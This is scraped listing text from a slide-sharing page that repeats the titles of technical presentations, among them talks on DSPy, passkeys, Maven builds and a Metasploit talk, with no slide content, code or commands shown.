Intro to White ChapelIntro to White Chapel
Intro to White Chapel
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
 

Recently uploaded

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 

Recently uploaded (20)

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 

Metasploit magic the dark coners of the framework